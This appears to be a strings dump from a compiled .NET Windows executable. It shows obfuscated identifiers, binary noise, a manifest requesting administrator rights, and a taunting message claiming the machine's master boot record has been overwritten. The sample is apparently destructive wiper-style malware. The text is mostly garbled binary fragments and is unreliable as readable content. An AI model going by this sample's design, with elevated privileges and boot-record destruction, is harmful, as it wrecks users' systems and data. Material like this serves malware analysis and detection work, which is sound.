G4a]uA
0@.>En
81!o"Q7W
tT.A|;
jla@m?
/S}iIg)
<Y#vVw
_CorExeMain
mscoree.dll
As you reboot, you find that your MBR has been overwritten.
Game Over.
GRfhn M
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
)O71O79OFAOKQOKYOKaOKiOKqOKyOF
.[P.S@.K@.
.k@.c@.C@.#@.
.;@.3@.+@I
&%'%)(*(+(,(-(
KfSYn6FmC82DaWHi5c.NeE3O4G0wCnpNbquqf
vujMuUBWwOF1C0rLWX.Vpu5AECPEtHS3mIJMj
{11111-22222-50001-00000}
h2QN0JHDmkRQp7QcpL.ULmfQSI6O6eMaNctp4
Cor_Enable_Profiling
file:///
Location
{11111-22222-40001-00001}
{11111-22222-40001-00002}